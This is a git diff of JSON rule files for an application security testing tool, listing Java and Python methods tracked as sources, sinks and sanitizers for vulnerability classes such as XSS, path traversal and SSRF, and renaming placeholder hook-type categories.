"value": "redos" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "com.github.mustachejava.codes.ValueCode.execute(java.io.Writer,java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "com.sun.faces.renderkit.html_basic.HtmlResponseWriter.write(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.servlet.ServletOutputStream.print(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.servlet.ServletOutputStream.println(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.servlet.ServletOutputStream.write(byte[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.servlet.ServletOutputStream.write(byte[],int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.format(java.lang.String,java.lang.Object[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P2,3", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.format(java.util.Locale,java.lang.String,java.lang.Object[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.print(char[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.print(java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.print(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.printf(java.lang.String,java.lang.Object[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P2,3", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.printf(java.util.Locale,java.lang.String,java.lang.Object[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.println(char[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.println(java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.println(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.write(char[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.write(char[],int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.write(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "java.io.PrintWriter.write(java.lang.String,int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.ServletOutputStream.print(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.ServletOutputStream.println(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.ServletOutputStream.write(byte[])" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.ServletOutputStream.write(byte[],int,int)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.jsp.JspWriter.print(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.jsp.JspWriter.println(java.lang.String)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.jsp.JspWriter.write(char[])" + "untags": [ + "base64-decoded" + ], + "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", - "stack_blacklist": [ - "OutSupport.writeEscapedXml" + "stack_blacklist": [], + "tags": [ + "base64-encoded" ], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.jsp.JspWriter.write(char[],int,int)" + "target": "R", + "track": "false", + "untags": [ + "base64-decoded" + ], + "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.jsp.JspWriter.write(java.lang.String)" + "tags": [ + "base64-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "base64-decoded" + ], + "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int,int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.jsp.JspWriter.write(java.lang.String,int,int)" + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.owasp.html.PolicyFactory.sanitize(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "org.apache.tapestry5.internal.services.MarkupWriterImpl.writeRaw(java.lang.String)" + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.owasp.validator.html.CleanResults.getCleanHTML()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "org.glassfish.jersey.message.internal.AbstractMessageReaderWriterProvider.writeToAsString(java.lang.String,java.io.OutputStream,javax.ws.rs.core.MediaType)" + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.owasp.validator.html.CleanResults.getCleanXMLDocumentFragment()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "org.glassfish.jersey.message.internal.ByteArrayProvider.writeTo(byte[],java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" - }, + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.owasp.validator.html.scan.AbstractAntiSamyScanner.scan(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "owasp-esapi" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.glassfish.jersey.message.internal.DataSourceProvider.writeTo(javax.activation.DataSource,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" + "value": "java.io.File.(java.io.File,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "org.owasp.esapi.reference.DefaultValidator.isValidDirectoryPath", + "org.owasp.esapi.reference.DefaultValidator.isValidFileName" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.glassfish.jersey.message.internal.FileProvider.writeTo(java.io.File,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" + "value": "java.io.File.(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "P1,2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.glassfish.jersey.message.internal.InputStreamProvider.writeTo(java.io.InputStream,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" + "value": "java.io.File.(java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.glassfish.jersey.message.internal.ReaderProvider.writeTo(java.io.Reader,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" + "value": "java.io.File.(java.net.URI)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "P1,2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.glassfish.jersey.message.internal.StringMessageProvider.writeTo(java.lang.String,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" + "value": "java.io.File.createTempFile(java.lang.String,java.lang.String,java.io.File)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P3", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.mule.module.http.internal.domain.response.DefaultHttpResponse.(org.mule.module.http.internal.domain.response.ResponseStatus,org.apache.commons.collections.MultiMap,org.mule.module.http.internal.domain.HttpEntity)" + "value": "java.io.FileInputStream.(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "P1,2", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.mule.module.http.internal.domain.response.HttpResponseBuilder.build(org.mule.module.http.internal.domain.HttpEntity)" + "value": "java.nio.file.FileSystem.getPath(java.lang.String,java.lang.String[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.mule.module.http.internal.domain.response.HttpResponseBuilder.setEntity(org.mule.module.http.internal.domain.HttpEntity)" + "value": "java.nio.file.spi.FileSystemProvider.getFileSystem(java.net.URI)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.mule.transformer.simple.SetPayloadMessageProcessor.resolveDataType(org.mule.DefaultMuleEvent,java.lang.Object)" - }, + "value": "java.nio.file.spi.FileSystemProvider.newFileSystem(java.net.URI,java.util.Map)" + } + ], + "enable": 1, + "type": 4, + "value": "path-traversal" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "source": "P1", - "stack_blacklist": [], + "stack_blacklist": [ + "org.springframework.web.util.UriComponentsBuilder.fromOriginHeader", + "org.springframework.web.util.UriComponentsBuilder.fromUriString" + ], "tags": [], "target": "", "track": "true", "untags": [], - "value": "org.mule.transformer.simple.SetPayloadMessageProcessor.resolveDataType(org.mule.api.MuleEvent,java.lang.Object)" + "value": "java.util.regex.Pattern.matcher(java.lang.CharSequence)" }, { "command": "", @@ -9356,12 +7847,12 @@ "target": "", "track": "true", "untags": [], - "value": "org.springframework.http.converter.StringHttpMessageConverter.writeInternal(java.lang.String,org.springframework.http.HttpOutputMessage)" + "value": "jregex.Pattern.matcher(java.lang.String)" } ], "enable": 1, "type": 4, - "value": "reflected-xss" + "value": "redos" }, { "details": [ @@ -9794,7 +8285,7 @@ "stack_blacklist": [], "tags": [], "target": "R", - "track": "false", + "track": "", "untags": [], "value": "org.springframework.cloud.config.server.resource.ResourceController.retrieve(java.lang.String,java.lang.String,java.lang.String,java.lang.String,boolean)" }, @@ -10806,104 +9297,6 @@ "type": 4, "value": "ssrf" }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "coldfusion.runtime.SessionScope.bind(java.lang.String,java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.servlet.http.HttpSession.putValue(java.lang.String,java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "jakarta.servlet.http.HttpSession.setAttribute(java.lang.String,java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.http.HttpSession.putValue(java.lang.String,java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.http.HttpSession.setAttribute(java.lang.String,java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "org.apache.struts2.dispatcher.SessionMap.put(java.lang.Object,java.lang.Object)" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "play.mvc.Http$Session.put(java.lang.String,java.lang.String)" - } - ], - "enable": 1, - "type": 4, - "value": "trust-boundary-violation" - }, { "details": [ { @@ -11476,14 +9869,14 @@ }, { "command": "", - "ignore_blacklist": true, + "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], "value": "org.xml.sax.InputSource.(java.io.Reader)" }, diff --git a/static/data/php_hooktype.json b/static/data/php_hooktype.json index 517fefb6c..ad2716c3e 100644 --- a/static/data/php_hooktype.json +++ b/static/data/php_hooktype.json @@ -3,130 +3,152 @@ "created_by": 1, "enable": 1, "language": 3, - "name": "1", + "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "1", + "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "system_type": 0, "type": 3, - "value": "1" + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "1", + "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "1", + "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "system_type": 0, "type": 4, - "value": "1" + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "123", + "name": "\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "123", - "system_type": 0, - "type": 3, - "value": "1" + "name_zh": "\u6587\u4ef6\u5199\u5165", + "system_type": 1, + "type": 4, + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "123", + "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "123", - "system_type": 0, + "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "system_type": 1, "type": 4, - "value": "1" + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "3", + "name": "\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "3", - "system_type": 0, + "name_zh": "\u6587\u4ef6\u5199\u5165", + "system_type": 1, "type": 3, - "value": "3" + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "3", + "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "3", - "system_type": 0, - "type": 4, - "value": "3" + "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "system_type": 1, + "type": 3, + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "\u6587\u4ef6\u5199\u5165", + "name": "GET", "name_en": null, - "name_zh": "\u6587\u4ef6\u5199\u5165", + "name_zh": "GET", "system_type": 1, - "type": 4, - "value": "FileWrite" + "type": 2, + "value": "GET" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", - "system_type": 1, + "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 3, + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, "type": 4, - "value": "FileWrite" + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "\u6587\u4ef6\u5199\u5165", + "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "\u6587\u4ef6\u5199\u5165", - "system_type": 1, + "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, "type": 3, - "value": "FileWrite" + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", - "system_type": 1, + "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "name_en": null, + "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "system_type": 0, "type": 3, - "value": "FileWrite" + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "GET", + "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", "name_en": null, - "name_zh": "GET", - "system_type": 1, - "type": 2, - "value": "GET" + "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 3, - "name": "\u547d\u4ee4\u6267\u884c123", + "name": "\u547d\u4ee4\u6267\u884c ", "name_en": "OS Command Injection", - "name_zh": "\u547d\u4ee4\u6267\u884c123", + "name_zh": "\u547d\u4ee4\u6267\u884c ", "system_type": 1, "type": 4, "value": "cmd-injection" @@ -406,28 +428,6 @@ "type": 4, "value": "ssrf" }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "test", - "name_en": null, - "name_zh": "test", - "system_type": 0, - "type": 3, - "value": "test" - }, - { - "created_by": 1, - "enable": 1, - "language": 3, - "name": "test", - "name_en": null, - "name_zh": "test", - "system_type": 0, - "type": 4, - "value": "test" - }, { "created_by": 1, "enable": 1, diff --git a/static/data/python_full_policy.json b/static/data/python_full_policy.json index eff2a626d..92610e536 100644 --- a/static/data/python_full_policy.json +++ b/static/data/python_full_policy.json @@ -358,7 +358,7 @@ "value": "Cryptodome.Cipher._mode_openpgp.OpenPgpMode.encrypt" } ], - "enable": 1, + "enable": 0, "type": 4, "value": "crypto-bad-ciphers" }, @@ -1854,7 +1854,7 @@ "value": "flask.app.Flask.make_response" } ], - "enable": 1, + "enable": 0, "type": 4, "value": "reflected-xss" }, diff --git a/static/data/python_hooktype.json b/static/data/python_hooktype.json index c21a585b8..68ec1d6ff 100644 --- a/static/data/python_hooktype.json +++ b/static/data/python_hooktype.json @@ -3,119 +3,141 @@ "created_by": 1, "enable": 1, "language": 2, - "name": "1", + "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "1", + "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "system_type": 0, "type": 3, - "value": "1" + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "1", + "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "1", + "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "system_type": 0, "type": 4, - "value": "1" + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "123", + "name": "\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "123", - "system_type": 0, - "type": 3, - "value": "1" + "name_zh": "\u6587\u4ef6\u5199\u5165", + "system_type": 1, + "type": 4, + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "123", + "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "123", - "system_type": 0, + "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "system_type": 1, "type": 4, - "value": "1" + "value": "FileWrite" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "3", + "name": "\u6587\u4ef6\u5199\u5165", "name_en": null, - "name_zh": "3", + "name_zh": "\u6587\u4ef6\u5199\u5165", + "system_type": 1, + "type": 3, + "value": "FileWrite" + }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "name_en": null, + "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "system_type": 1, + "type": 3, + "value": "FileWrite" + }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", "system_type": 0, "type": 3, - "value": "3" + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "3", + "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "3", + "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", "system_type": 0, "type": 4, - "value": "3" + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "\u6587\u4ef6\u5199\u5165", + "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "\u6587\u4ef6\u5199\u5165", - "system_type": 1, - "type": 4, - "value": "FileWrite" + "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 3, + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", "name_en": null, - "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", - "system_type": 1, + "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, "type": 4, - "value": "FileWrite" + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "\u6587\u4ef6\u5199\u5165", + "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", "name_en": null, - "name_zh": "\u6587\u4ef6\u5199\u5165", - "system_type": 1, + "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "system_type": 0, "type": 3, - "value": "FileWrite" + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", + "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", "name_en": null, - "name_zh": "\u4efb\u610f\u6587\u4ef6\u5199\u5165", - "system_type": 1, - "type": 3, - "value": "FileWrite" + "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" }, { "created_by": 1, "enable": 1, "language": 2, - "name": "\u547d\u4ee4\u6267\u884c123", + "name": "\u547d\u4ee4\u6267\u884c ", "name_en": "OS Command Injection", - "name_zh": "\u547d\u4ee4\u6267\u884c123", + "name_zh": "\u547d\u4ee4\u6267\u884c ", "system_type": 1, "type": 4, "value": "cmd-injection" @@ -527,28 +549,6 @@ "type": 4, "value": "ssrf" }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "test", - "name_en": null, - "name_zh": "test", - "system_type": 0, - "type": 3, - "value": "test" - }, - { - "created_by": 1, - "enable": 1, - "language": 2, - "name": "test", - "name_en": null, - "name_zh": "test", - "system_type": 0, - "type": 4, - "value": "test" - }, { "created_by": 1, "enable": 1, diff --git a/static/data/python_policy.json b/static/data/python_policy.json index e7135ac95..380113cba 100644 --- a/static/data/python_policy.json +++ b/static/data/python_policy.json @@ -78,195 +78,6 @@ "type": 4, "value": "code-execution" }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Crypto.Cipher._mode_cbc.CbcMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Crypto.Cipher._mode_cfb.CfbMode.encrypt" - }, - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "false", - "source": "P1,2,plaintext", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "Crypto.Cipher._mode_ctr.CtrMode.encrypt" - }, - { - 